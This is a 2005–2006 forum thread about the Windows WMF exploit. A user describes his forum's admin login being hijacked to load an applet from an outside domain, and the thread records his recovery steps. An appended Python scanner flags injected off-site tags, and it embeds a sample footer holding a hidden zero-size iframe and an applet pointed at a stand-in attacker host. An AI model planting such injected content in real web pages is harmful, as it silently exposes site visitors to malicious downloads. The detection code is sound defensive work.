Shandril
12-29-2005, 12:23 AM
Washingtonpost.com reports
Security researchers have released instructions for exploiting a previously unknown security hole in Windows XP and Windows 2003 Web Server with all of the latest patches applied.
Anti-virus company Symantec warned of the new exploit, which it said uses a vulnerability in the way Windows computers process certain image files (Windows Meta Files, or those ending in .wmf).
For the complete article go here:
http://blogs.washingtonpost.com/securityfix/2005/12/exploit_release.html
BlueDragon1981
01-31-2006, 11:37 PM
Trojan.Win32.WMF.exploit.generic
Exploit.WMF.A
xpl.wmf
xml.wmf
The above has infected my computer. Even worse, it has affected my admin account on my forum. Now I am trying to get back into this file and get the database backed up, but it will not allow me to go any further. It tries to download a file when I use it through Firefox. The place it says it's from is http://games4all.com; there was another one too, but I don't remember it. This is basically malicious code that allows for remote access to you for the simple purpose of using you as a spam bot. Now I am trying to remedy this problem because I need to get in and back up my database. Other accounts don't seem to be affected, so far. Now, if this code is in the code for my database, then I don't know what I am going to do. Currently I am running my spyware programs; I am also going to run my anti-virus.
Here is more on this problem....
http://www.averyjparker.com/2006/01/01/wmf-exploit-and-windows-98/
http://www3.ca.com/securityadvisor/pest/pest.aspx?id=453096781
Anti Malware Site
www.kbcafe.com/spam/200512.xml
Here is Microsoft's take on it.....
http://www.microsoft.com/technet/security/advisory/912840.mspx
The download for a fix....
http://www.microsoft.com/downloads/details.aspx?familyid=0C1B4C96-57AE-499E-B89B-215B7BB4D8E9&displaylang=en
Now if that is attached to my code on my server I don't know what to do....
I'm also going to try to log in with Linux. If it still happens with that, then I think I am well....screwed.
Any help on how to work through this on the database let me know...
BlueDragon1981
01-31-2006, 11:40 PM
This also tries to use the Java Runtime Environment....
Tales from the Java console...
load: class BlackBox.class not found.
java.lang.ClassNotFoundException: BlackBox.class
    at sun.applet.AppletClassLoader.findClass(Unknown Source)
    at java.lang.ClassLoader.loadClass(Unknown Source)
    at sun.applet.AppletClassLoader.loadClass(Unknown Source)
    at java.lang.ClassLoader.loadClass(Unknown Source)
    at sun.applet.AppletClassLoader.loadCode(Unknown Source)
    at sun.applet.AppletPanel.createApplet(Unknown Source)
    at sun.plugin.AppletViewer.createApplet(Unknown Source)
    at sun.applet.AppletPanel.runLoader(Unknown Source)
    at sun.applet.AppletPanel.run(Unknown Source)
    at java.lang.Thread.run(Unknown Source)
Caused by: java.io.IOException: open HTTP connection failed.
    at sun.applet.AppletClassLoader.getBytes(Unknown Source)
    at sun.applet.AppletClassLoader.access$100(Unknown Source)
    at sun.applet.AppletClassLoader$1.run(Unknown Source)
    at java.security.AccessController.doPrivileged(Native Method)
    ... 10 more
BlueDragon1981
02-01-2006, 12:33 AM
Well, it's in the code....like I feared...
Silent Bob
02-01-2006, 12:47 AM
'Fraid I can't help. I'm not up on the latest Windows viruses. :(
BlueDragon1981
02-01-2006, 01:45 AM
Do you think it would be in the database code or the HTML code connected to it? Because the site works for others. I did the same thing on Linux, so it has to be a corruption in a file that is on my host.
I found a way to get into the admin and back up the database. Basically, I changed the raw database file of another user and made it the admin. So I have that backed up. Now I just need to figure out why it is attached to that particular user file....which is what is baffling me.
I cleared the cache for the Java console, looked through the registry for the particular files, cleared the cache for the browsers, installed the recommended update and restarted....still the same. So that is why I believe it is attached to a file on my host.
Any suggestions....?
Silent Bob
02-01-2006, 10:47 AM
Download all the files to a Linux box and scan them there.
Also, this is a windows server right? I'd let the host know so they can clean it from their end. You'll never get it all on your own, as you most likely lack the permissions and access needed for a full clean.
BlueDragon1981
02-01-2006, 06:13 PM
I believe it was somehow attached to the PHP file that initiates the login for that particular user. What I did was create a new user, go to the raw database file and change the user type to admin. I then backed up the database and removed the forum. After that I recreated the forum, uploaded the picture files and then reinstalled the database. Some things still need to be worked out, but so far so good. I took the long way, I know, but I came to the conclusion that the best way to do it was a clean install.
The server is supposed to be on a Linux system. The suggestion of downloading it to the Linux distro was good, and if it happens again, which I hope it doesn't, then I will do that. Once I know more about PHP and SQL I might be able to single out the problem.
Here are some things I ran into while this was happening. Internet Explorer did not engage the Java protocol; it just froze....and did not show me it was trying to initiate 'http://gamez4all.biz'. Firefox, on the other hand, did, and it gave me a weird page with just the footer, but the footer said noadwarekey. The site tried to initiate and the Java came up. So because of my virus scanner and Mozilla it never came through as more than the corrupted code.
When trying to upload the database, it did not work correctly when I tried using Firefox. I used Internet Explorer and it worked fine. I'm not sure as to why this happened, other than that the host may be set up more for Internet Explorer, or the way the proxy works on Firefox. I did disable the proxy but it still did not work...but I did not restart the computer. I cleared the cache and cookies of the computer just in case.
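Silent Bob's advice to pull the site's files down to a Linux box and scan them there, together with what BlueDragon found (a footer template and a PHP login file carrying an off-site redirect and a Java applet), can be turned into a quick offline triage. The script below is an added example, not code from the thread or from any forum package: it walks a downloaded web root and flags tags that load content from a host other than the site's own, any applet tag, and zero-size iframes. The sample footer, the host names forum.example and evil.example, and the file extensions scanned are constructed assumptions.

```python
"""Offline triage of a downloaded web root for injected off-site content.

Run as:  python scan_webroot.py /path/to/downloaded/site forum.example
With no arguments it scans the constructed SAMPLE_FOOTER below.
"""
import os
import re
import sys
from urllib.parse import urlparse

# Tags whose URL-bearing attribute can pull in third-party content.
TAG_RE = re.compile(
    r"<(?P<tag>script|iframe|applet|embed|object)\b(?P<attrs>[^>]*)>",
    re.IGNORECASE,
)
# name="value", name='value' or name=value (unquoted) inside a tag.
ATTR_RE = re.compile(r"(?P<name>\w+)\s*=\s*[\"']?(?P<value>[^\"'\s>]+)", re.IGNORECASE)

# Assumed set of text files worth scanning in a forum install.
SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js", ".tpl")

# Constructed sample of a forum footer template after an injection (not taken
# from the thread). The script tag is legitimate, site-local content; the
# iframe and applet are the kind of additions a compromise leaves behind.
SAMPLE_FOOTER = """<div id="footer">
<script type="text/javascript" src="http://forum.example/js/footer.js"></script>
<iframe src="http://evil.example/in.php" width="0" height="0" frameborder="0"></iframe>
<applet code="BlackBox.class" codebase="http://evil.example/" width="1" height="1"></applet>
</div>
"""


def parse_attrs(attr_text):
    """Return a lower-cased attribute name -> value dict for one tag."""
    return {m.group("name").lower(): m.group("value") for m in ATTR_RE.finditer(attr_text)}


def host_of(url):
    """Return the lower-cased hostname of an absolute URL, or None for a relative one."""
    host = urlparse(url).hostname
    return host.lower() if host else None


def find_injections(source, site_host):
    """Return suspicious tags found in one file's text.

    A tag is reported when it is an <applet>, when it loads from a host other
    than site_host, or when it is an iframe collapsed to zero width or height
    (a common way to hide a redirect to a second site).
    """
    findings = []
    for m in TAG_RE.finditer(source):
        tag = m.group("tag").lower()
        attrs = parse_attrs(m.group("attrs"))
        url = attrs.get("src") or attrs.get("codebase") or attrs.get("data") or ""
        host = host_of(url)
        line = source.count("\n", 0, m.start()) + 1
        reasons = []
        if tag == "applet":
            reasons.append("applet tag")
        if host and host != site_host.lower():
            reasons.append("off-site host %s" % host)
        if tag == "iframe" and (attrs.get("width") in ("0", "0px") or attrs.get("height") in ("0", "0px")):
            reasons.append("zero-size iframe")
        if reasons:
            findings.append({"line": line, "tag": tag, "url": url, "reasons": reasons})
    return findings


def scan_tree(root, site_host):
    """Walk a downloaded web root and map each flagged file to its findings."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = find_injections(fh.read(), site_host)
            if found:
                results[path] = found
    return results


if __name__ == "__main__":
    if len(sys.argv) == 3:
        report = scan_tree(sys.argv[1], sys.argv[2])
    else:
        report = {"<sample footer>": find_injections(SAMPLE_FOOTER, "forum.example")}
    for path, found in report.items():
        for f in found:
            print("%s:%d <%s> %s  [%s]" % (path, f["line"], f["tag"], f["url"], "; ".join(f["reasons"])))
```

The site's own host is a parameter rather than being guessed from the files, because a legitimate template may reference a CDN or a second domain the owner knows about; anything the scan reports still has to be read by a person. Compared with grepping for one known bad domain, matching on "not our host" also catches the second site BlueDragon could not remember the name of.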
BlueDragon1981
02-03-2006, 01:15 AM
Ever heard of buying a virus exploit....well if you haven't then here you go.
http://it.slashdot.org/article.pl?sid=06/02/02/215210&from=rss
http://news.com.com/2100-7349_3-6034591.html?part=rss&tag=6034591&subj=news
I think they found a new market...selling exploits in Windows software to foreign countries....